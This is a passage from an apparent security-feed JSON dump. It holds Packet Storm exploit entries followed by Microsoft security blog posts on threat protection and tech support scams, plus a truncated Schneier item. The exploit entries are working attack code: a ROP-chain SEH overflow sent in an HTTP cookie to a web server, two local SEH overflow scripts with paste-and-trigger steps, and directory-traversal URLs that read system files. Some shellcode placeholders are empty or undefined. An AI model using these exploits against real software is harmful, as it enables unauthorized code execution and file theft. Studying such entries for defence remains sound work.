struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 
0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX 
# ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \n \n# ECX = lpOldProtect (ptr to W address) \nbuffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll] \n \n# EBX = dwSize (0x00000501) \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate \nbuffer += struct.pack('<L', 
0x100231d1) # NEG EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll] \n \n# EDI = ROP NOP (RETN) \nbuffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \n \n# EAX = NOP (0x90909090) \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x90909090) # nop \nbuffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll] \n \nbuffer += \"\\x90\" * 50 # nop \nbuffer += shellcode # calc.exe \nbuffer += \"\\x90\" * 50 # nop \n \nbuffer += '\\x45' * (1412-(4*88)+128-len(shellcode)-100) \nbuffer += '\\x42' * 4 # nSEH filler \n \n# stack pivot that will land somewhere in buffer of As \nbuffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll] \n \nbuffer += '\\x44' * (5000-4059-4-4) \n \nprint \"[+] Sending %s bytes of evil payload..\" %len(buffer) \ntime.sleep(1) \n \ntry: \ncookies = dict(SESSIONID='6771', UserID=buffer,PassWD='') \ndata=dict(frmLogin='',frmUserName='',frmUserPass='',login='') \nrequests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data) \nexcept: \nprint \"The server stopped responding. 
You should see calc.exe by now ;D\" \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147336/efsws72userid-overflow.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "T3jv1l", "published": "2018-04-24T00:00:00", "title": "Allok Video To DVD Burner 2.6.1217 Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147339", "href": "https://packetstormsecurity.com/files/147339/Allok-Video-To-DVD-Burner-2.6.1217-Buffer-Overflow.html", "sourceData": "`####################################################### \n# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217 \n# Date: 23.04.2018 \n# Exploit Author:T3jv1l \n# Vendor Homepage:http://www.alloksoft.com/ \n# Software: www.alloksoft.com/allok_dvdburner.exe \n# Category:Local \n# Contact:https://twitter.com/T3jv1l \n# Version: Allok Video to DVD Burner 2.6.1217 \n# Tested on: Windows 7 SP1 x86 \n# Hello subinacls ! \n# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ \n############################################################# \n \nprint\"\"\" \n#1. Download and install the setup file \n#2. Run this exploit code via python 2.7 \n#3. A file \"Evil.txt\" will be created \n#4. Copy the contents of the file (Evil.txt)and paste in the License Name field \n#5. Click Register and BOMM !!!! 
\"\"\" \n \nimport struct \n \nfile = open(\"Evil.txt\",\"wb\") \nbuffer = 4000 \njunk = \"A\" * 780 \nnseh = \"\\x90\\x90\\xeb\\x10\" \nseh = struct.pack(\"<L\",0x10019A09) \nnop = \"\\x90\" * 20 \n \n# Shellcode Calc.exe \n \nbuf = \"\" \nexploit = junk + nseh + seh + nop + buf \nfillers = buffer - len(exploit) \ncrush = exploit + \"T\" * fillers \nprint \"[+] Crush Me\" \nfile.write(crush) \nfile.close() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147339/allokvideodvdburner26-overflow.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", 
"edition": 1, "reporter": "bzyo", "published": "2018-04-24T00:00:00", "title": "R 3.4.4 Local Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9060"], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147338", "href": "https://packetstormsecurity.com/files/147338/R-3.4.4-Local-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/python \n \n# \n# Exploit Author: bzyo \n# CVE: CVE-2018-9060 \n# Twitter: @bzyo_ \n# Exploit Title: R 3.4.4 - Local Buffer Overflow \n# Date: 03-27-2018 \n# Vulnerable Software: R 3.4.4 \n# Vendor Homepage: https://www.r-project.org/ \n# Version: 3.4.4 \n# Software Link: https://cloud.r-project.org/bin/windows/ \n# Tested On: Windows 7 x86 \n# \n# Timeline: \n# 03-27-18: Emailed author, no response \n# 04-03-18: Emailed author, no response \n# 04-10-18: Emailed author, no response \n# 04-23-18: New version released; Submitted public disclosure \n# \n# lots of bad chars, use alpha_mixed \n# badchars \\x00\\x0a\\x0d\\x0e and \\x80 through \\xbf \n# \n# \n# PoC: \n# 1. generate r344.txt, copy contents to clipboard \n# 2. open app, select Edit, select 'GUI preferences' \n# 3. paste r344.txt contents into 'Language for menus and messages' \n# 4. select OK \n# 5. 
pop calc \n# \n \n \nfilename=\"r344.txt\" \n \njunk = \"A\"*900 \n \n#jump 6 \nnseh = \"\\xeb\\x06\\xcc\\xcc\" \n \n#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll] \nseh = \"\\xaf\\x17\\x3c\\x64\" \n \n#msfvenom -a x86 -p windows/exec CMD=calc.exe -b \"\\x00\\x0a\\x0d\\x0e\" -e x86/alpha_mixed -f c \n#Payload size: 448 bytes \n \nfill = \"D\"*8000 \n \nbuffer = junk + nseh + seh + calc + fill \n \ntextfile = open(filename , 'w') \ntextfile.write(buffer) \ntextfile.close() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147338/r344-overflow.txt"}, {"lastseen": "2018-04-24T09:30:29", "references": [], "description": "", "edition": 1, "reporter": "Javier Bernardo", "published": "2018-04-23T00:00:00", "title": "Ncomputing vSPace Pro 10 / 11 Directory Traversal", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10201"], "modified": "2018-04-23T00:00:00", "id": "PACKETSTORM:147303", "href": "https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html", "sourceData": "`# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability \n# Date: 2018-04-20 \n# Software Vendor: NComputing \n# Software Link: \n# Author: Javier Bernardo \n# CVE: CVE-2018-10201 \n# Category: Webapps \n \n#[Description] \n# \n#It is possible to read arbitrary files 
outside the root directory of \n#the web server. This vulnerability could be exploited remotely by a \n#crafted URL without credentials, with a|/ or a|\\ or a|./ or a|.\\ as a \n#directory-traversal pattern to TCP port 8667. \n# \n#An attacker can make use of this vulnerability to step out of the root \n#directory and access other parts of the file system. This might give \n#the attacker the ability to view restricted files, which could provide \n#the attacker with more information required to further compromise the system. \n \n#[PoC] \n \nnmap -p T:8667 -Pn your_vSpace_server \n \nNmap scan report for your_vSpace_server (x.x.x.x) \nHost is up (0.044s latency). \n \nPORT STATE SERVICE \n8667/tcp open unknown \n \nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini \n \nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini \n \nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini \n \nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147303/ncomputingvspace-traversal.txt"}], "mssecure": [{"lastseen": "2018-04-24T22:29:29", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security._\n\n## The roots of Microsoft 365 threat protection\n\nOver the next few weeks, we'll introduce you to Microsoft 365's threat protection services and demonstrate how Microsoft 365's threat protection leverages strength of signal, integration, machine learning and AI to help secure the modern workplace from a ransomware attack. 
[Previously](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/how-office-365-protects-your-organization-from-modern-phishing-campaigns/>), we showcased how Office 365 helps mitigate modern phishing attacks. Microsoft 365 threat protection goes even further, providing robust protection, detection, and response capabilities across an organization's entire attack surface. For those not aware, Microsoft 365 was [introduced](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>) at last year's [Microsoft Inspire conference](<https://partner.microsoft.com/en-US/inspire/>), to provide an intelligent, integrated, and secure solution for the [modern workplace](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>), combining the benefits of Microsoft's flagship Windows, Office 365, and Enterprise Mobility Suite (EMS) platforms. Figure 1 shows the services which are part of Microsoft 365 threat protection and jointly help secure the modern workplace so organizations can initiate and drive their digital transformation.\n\n\n\n_Figure 1. The Microsoft 365 threat protection security services_\n\n## Microsoft is committed to a security first mindset\n\nMicrosoft has always been securing products and platforms to protect our customers who rely on our software and cloud services. Our security focus is essential to meet the 24/7 business cycle demands and helps ensure our customers rarely experience downtime from a security event. Microsoft invests $1B+ annually on security, employs [3500+ security professionals](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>), and has built several strong ecosystem partnerships. As the modern workplace grows in complexity, Microsoft continues building and enhancing its security capabilities to help our customers stay ahead of modern threats. 
Microsoft itself is one of the world's largest enterprises and uses the same security products to protect our organization that we offer our customers.\n\n## The Microsoft Intelligent Security Graph\n\nFor our teams at Microsoft (both in operations and development), security really begins with the [Microsoft Intelligent Security Graph](<http://www.microsoft.com/intelligence>). It is the platform that powers Microsoft security products and services by using advanced analytics to link threat intelligence and security signals from Microsoft and partners to identify and mitigate cyberthreats. Intelligence in the Intelligent Security Graph comes from consumer and commercial services that Microsoft operates on a global scale, such as Windows, Office 365, and Azure as shown in figure 2. At Microsoft, we have massive depth and breadth of intelligence. Across our global services, each month we scan 400 billion email messages for phishing and malware, process 450 billion authentications, execute more than 18 billion web page scans, and scan more than 1.2 billion devices for threats, nearly 2.6 billion monthly unique file scans, and more than 200 cloud services. Importantly, this data always goes through strict privacy and compliance boundaries before being used for security.\n\n\n\n_Figure 2. Microsoft's Global Threat Intelligence is one of the largest in industry_\n\nSignal from the graph is analyzed using a combination of Microsoft's industry-leading artificial intelligence and machine learning capabilities coupled with the expertise of security researchers, analysts, hunters, and engineers across the company to quickly identify attacks and emerging trends so that we can evolve the immediate detections and capabilities of Microsoft 365. 
All our security capabilities leverage the graph, including the threat protection services comprised of Windows Defender Advanced Threat Protection (WDATP), Office 365 Advanced Threat Protection (ATP), Office 365 Threat Intelligence, Microsoft Cloud App Security, Azure Security Center, and the newly launched Azure Advanced Threat Protection (Azure ATP).\n\nThese threat protection services also share threat signal with each other through the graph, and this signal sharing enables each service to leverage threat data not only from the threats blocked by that service but also from threats across the entire threat landscape. While this post uses the example of a sophisticated ransomware attack, customers who leverage the entire Microsoft 365 threat protection stack will have near real-time protection from many types of new and unknown threats (e.g. 0-days, advanced phishing, advanced malware, etc.) for their device ecosystem, Office 365 ecosystem, and cloud, on-premises, or hybrid infrastructures by leveraging the Intelligent Security Graph.\n\n## Microsoft 365 threat protection\n\nThe modern workplace is exposed to the rapid evolution of cyber threats, from individual threats, to [sophisticated organizational breaches](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>), to [rapid cyberattacks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/01/23/overview-of-rapid-cyberattacks/>). With the growing complexity of the modern workplace, the attack surface has rapidly expanded, to a point where no single service can adequately protect an organization. To address this, we focused on developing different services that specialize in the main threat vectors and then integrating them together via the Intelligent Security Graph. The modern workplace is composed of employee identities, enterprise applications and data, devices, and infrastructure. 
Microsoft 365 threat protection helps mitigate advanced threats from each of these potential threat vectors, providing an end-to-end, holistic solution that secures an organization's entire attack surface, enabling:\n\n * **Protection** against advanced threats such as 0-days, targeted phishing, ransomware, and others\n * **Detection** of when a breach has occurred, who has been breached, and what data has been compromised\n * **Response** to remediate an attack and return the organization to a no-threat state\n * **Education** of end users on how to react or respond to different types of threats\n\nWhile most security solutions do not include an educational component, we have seen that many of our customers now help educate their end users on how to react and behave in the event of a cyberattack. To help address this important aspect of security, we now offer tools that can help educate end users. While the majority of attacks are still initiated via email, 2017's most destructive attacks, NotPetya and WannaCry, were not email-based. One of the benefits of Microsoft 365 threat protection is seamless integration that enables rapid transfer of information across platforms and services to help ensure all attack surfaces are quickly secured no matter where a threat originates. Over the next few weeks, we will cover Microsoft 365 and how to enable (1) Protection, (2) Detection, (3) Response, and Education. 
Next week, we'll demonstrate how Microsoft 365 threat protection helps organizations protect themselves from a ransomware attack.", "reporter": "Microsoft Secure Blog Staff", "published": "2018-04-24T16:00:23", "type": "mssecure", "title": "Securing the modern workplace with Microsoft 365 threat protection \u2013 part 1", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-24T16:00:23", "id": "MSSECURE:5616DCEDB71881288A5529796CF9C8BA", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/24/securing-the-modern-workplace-with-microsoft-365-threat-protection-part-1/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T17:28:45", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_(Editor's note: Erik Wahlstrom spoke about the far-reaching impact of tech support scams and the need for industry-wide cooperation in his RSA Conference 2018 talk Tech Scams: It's Time to Release the Hounds.)_\n\n \n\nSocial engineering attacks like [tech support scams](<https://www.microsoft.com/en-us/wdsi/threats/support-scams>) are so common because they're so effective. Cybercriminals want to bilk users' money. They can spend a great deal of time and energy attacking the security of a device: brute-force passwords, develop custom and sophisticated malware, and hunt down vulnerabilities to exploit. Or they can save themselves the trouble and convince users to freely give up access to their devices and sensitive information.\n\nMicrosoft has built the most secure version of its platform in Windows 10. 
Core OS technologies like [virtualization-based security](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>), [kernel-based mitigations](<https://cloudblogs.microsoft.com/microsoftsecure/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), and the [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) stack of security defenses make it much more difficult for exploits, malware, and other threats to infect devices. Every day, [machine learning](<https://cloudblogs.microsoft.com/microsoftsecure/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/>) and artificial intelligence in Windows Defender ATP protect millions of devices from [malware outbreaks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>) and cyberattacks. In many cases, customers may not even know they were protected. [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s?ocid=cx-blog-mmpc>), a special configuration of Windows 10, takes this even further by only running apps from the Microsoft Store, effectively preventing the vast majority of attacks.\n\n**Protect yourself from tech support scams**\n\n * Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or financial information, or to fix your computer.\n * Remember, Microsoft will never proactively reach out to you to provide unsolicited PC or technical support. Any communication we have with you must be initiated by you.\n * Don't call the number in pop-ups. Microsoft's error and warning messages never include a phone number. 
\n--- \n \nThe [Windows 10 security stack](<https://blogs.windows.com/business/2018/04/17/new-capabilities-of-windows-defender-atp-further-maximizing-the-effectiveness-and-robustness-of-endpoint-security/>) greatly increases the cost for attackers. Many cybercriminals instead choose to target the humans in front of the PCs. It can sometimes be easier to convince users to willingly share their passwords, account info, or to install hazardous apps onto their device than to develop malware and steal info unnoticed.\n\nScammers continue to capitalize on the proven effectiveness of social engineering to perpetrate tech support scams. These scams are designed to trick users into believing their devices are compromised or broken. They do this to scare or coerce victims into purchasing unnecessary support services.\n\nTo help protect customers from scammers, we continue to enhance [antivirus](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>), [email](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection?ocid=cx-blog-mmpc>), [URL blocking](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-smartscreen/windows-defender-smartscreen-overview>), and [browser security](<https://cloudblogs.microsoft.com/microsoftsecure/2017/10/23/making-microsoft-edge-the-most-secure-browser-with-windows-defender-application-guard/>) solutions. However, given the scale and complexity of tech support scams, how can the security industry at large work together to deal a major blow to this enduring threat?\n\n## Still a growing global problem\n\nIn 2017, Microsoft Customer Support Services received 153,000 reports from customers who encountered or fell victim to tech support scams, a 24% growth from the previous year. These reports came from 183 countries, indicating a global problem.\n\nApproximately 15% of these customers lost money in the scam, costing them on average between $200 and $400. 
In some cases, victims pay a lot more. In December 2017, Microsoft received a report of a scammer emptying a bank account of 89,000 during a tech support scam in the Netherlands.\n\nIn a 2016 [survey](<https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/10.17-Methodology.pdf>) sponsored by Microsoft, two in three respondents reported experiencing some form of tech support scam in the previous 12 months, with nearly one in ten losing money.\n\nHowever, as with many social engineering attacks, it's tricky to put an absolute number to the problem. The figures above represent reports to Microsoft. The problem is so much bigger, given that tech support scams target customers of various other devices, platforms, or software.\n\n## An organized cybercriminal enterprise\n\nTech support scams come in several forms, but they share a common attack plan:\n\nScammers initiate these social engineering attacks in many ways, including:\n\n * **Scam websites** that use various tactics including browser dialog traps, fake antivirus detecting fake threats, and fake full-screen error messages. Scammers lead potential victims to these websites through ads, search results, typosquatting and other fraudulent mechanisms.\n * **Email campaigns** that use phishing-like techniques to trick recipients into clicking URLs or opening malicious attachments\n * **Malware** that's installed on computers to make system changes and display fake error messages\n * **Unsolicited phone calls** (also known as **cold calls**), which are telemarketing calls from scammers that pretend to be from a vendor's support team\n\nThe complete attack chain shows that these attacks lead to the same goal of getting customers in contact with a call center. Once connected, a fake technician (an experienced scammer) convinces the victim of a problem with their device. They often scare victims with urgent problems requiring immediate action. 
They instruct victims to install remote administration tools (RATs), which provide the scammers access to and control over the device.\n\nFrom this point on, scammers can make changes to the device or point out common non-critical errors, and present these as problems. For example, scammers are known to use Event Viewer to show errors or netstat to show connections to foreign IP addresses. The scammers then attempt to make the sale. With control of the device, scammers can make a compelling case about errors in the device and pressure the victim to pay.\n\n## An industry-wide problem requires industry-wide action\n\nThe tech support scam problem is far-reaching. Its impact spans various platforms, devices, software, and services. Examples include:\n\n * Tech support scams targeting specific platforms like Windows, macOS, iOS, and Android\n * Tech support scam websites that imply a formal relationship or some sort of approval by well-known vendors\n * Fake malware detection from programs or websites that mimic various antivirus solutions\n * Customized tech support scams that tailor messages and techniques based on geography, OS, browser, or ISP\n\nAs in many forms of social engineering attacks, customer education is key. There _are_ tell-tale signs: normal error and warning messages should not have phone numbers, most vendors don't make unsolicited phone calls to fix a device, etc. To help protect and educate Microsoft customers, we have published [blogs](<https://cloudblogs.microsoft.com/microsoftsecure/tag/tech-support-scam/>), [websites](<https://www.microsoft.com/en-us/wdsi/threats/support-scams>), [videos](<https://www.youtube.com/watch?v=IzYk-y-0raE>), and [social media](<https://twitter.com/wdsecurity>) campaigns on the latest tech support scam trends and tactics. 
We have also empowered customers to [report tech support scams](<https://www.microsoft.com/reportascam>).\n\nBeyond customer education, the scale and complexity of tech support scams require cooperation and broad partnerships across the industry. The Microsoft Digital Crimes Unit (DCU) works with law enforcement and other agencies to [crack down on scammers](<https://blogs.microsoft.com/ai/microsoft-used-ai-help-crack-tech-support-scams-worldwide/>).\n\nWe have further built partnerships across the ecosystem to make a significant dent in this issue:\n\n * Web hosting providers, which can take down verified tech support scam websites\n * Telecom networks, which can block tech support scam phone numbers\n * Browser developers, who can continuously thwart tech support scam tactics and block tech support scam websites\n * Antivirus solutions, which can detect tech support scam malware\n * Financial networks, which can help protect customers from fraudulent transactions\n * Law enforcement agencies, who can go after the crooks\n\nWe seek to continue expanding and enriching these partnerships. While we continue to help protect customers through a hardened platform and increasingly better security solutions, we believe it's high time for the industry to come together and put an end to the tech support scam problem. Together, we can make our customers' lives easier and safer.\n\n**_Erik Wahlstrom_** \n_Windows Defender Research Project Manager_\n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "reporter": "Windows Defender ATP", "published": "2018-04-20T17:00:23", "type": "mssecure", "title": "Teaming up in the war on tech support scams", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-20T17:00:23", "id": "MSSECURE:363AAF37C44886432CAD4640BFF63B64", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/20/teaming-up-in-the-war-on-tech-support-scams/", "cvss": {"score": 0.0, "vector": "NONE"}}], "schneier": [{"lastseen": "2018-04-25T14:39:48", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\"[Do Not Disturb](<https://objective-see.com/products/dnd.html>)\" is a Macintosh app that sends an alert when the lid is opened. The idea is to detect computer tampering.\n\nWired [article](<https://www.wired.com/story/do-not-disturb-app-macbook-evil-maid-attacks/>):\n\n> Do Not Disturb goes a step further than just the push notification. Using the Do Not Disturb iOS app, a notified user can send themselves a picture snapped with the laptop's webcam to catch the perpetrator in the act, or they can shut down the computer remotely. The app can also be configured 